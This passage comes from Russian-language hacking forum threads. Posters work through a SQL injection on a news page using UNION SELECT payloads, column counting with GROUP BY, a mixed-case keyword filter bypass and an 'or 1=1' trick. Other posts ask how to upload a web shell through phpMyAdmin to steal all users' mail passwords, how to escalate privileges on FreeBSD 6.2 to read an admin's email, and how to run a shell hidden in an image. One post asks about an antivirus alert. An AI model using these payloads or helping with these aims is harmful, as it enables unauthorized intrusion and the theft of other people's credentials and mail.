А смотрите допустим я нашёл дырку site.ru/news.php?id=1+union+select+1,2-- Теперь нам надо вывести мои 1,2 Но есть я делаю так site.ru/news.php?id=1999+union+select+1,2-- или site.ru/news.php?id=-1+union+select+1,2-- То идёт 404 Как быть? Это 100% редирект идёт так-как новость не найдена...а SQL-inj Есть
Дак идёт ридерект на 404 при нормальном запросе к бд! Вы читать то умеете? Я изменяю id На несуществующий и возникает 404 а не в инъекции у меня ошибка!
тоесть в место site.ru/news.php?id=-1+union+select+1,2-- нуно site.ru/news.php?id=-1+union+selecT+1,2-- site.ru/news.php?id=-1+union+seLecT+1,2-- ну и далее пока ошибка не изчезнит.... (хотя не факт что изчезнет )
site.ru/news.php?id=1+group+by+10-- 404 site.ru/news.php?id=1+group+by+5-- 404 site.ru/news.php?id=1+group+by+3-- 404 site.ru/news.php?id=1+group+by+2-- ok site.ru/news.php?id=1+union+select+1,2-- ok site.ru/news.php?id=-1+union+select+1,2-- 404 site.ru/news.php?id=1999+union+select+1,2-- 404 site.ru/news.php?id=1999+or+1=1+union+select+1,2-- ok
У меня такой вопрос а можно через phpMyAdmin залить шел с правими root! А то шел тоит токо читаю папки сайта! пробовал поднять права не получается. А нужно узнать пароли на мыло все юзеров
сплоит юзал ничего не помогло там стоит FreeBSD 6.2-RELEASE есть один сплоит http://milw0rm.com но не подходит! А очень нужно почту админа почитать
У меня нод32 всё время ругается на ИП 89.111.176.83 по порту 21 PHP: 12.04.2009 12:31:52 Обнаружена атака Reverse TCP Desynchronization 89.111.176.83:21 192.168.0.100:4456 TCP Подскажите что он пытается сделать на 21 порту И что это за порт? Причём локальные порты меняются... 4456 4795 1746 2282 Тип атаки 1 и тот-же В чём уязвимость моей машины?
Если залил шелл в картинке, то как им управлять? Ну вроде как шелл загркузается аж нод заорал... Но как его откруть для работы?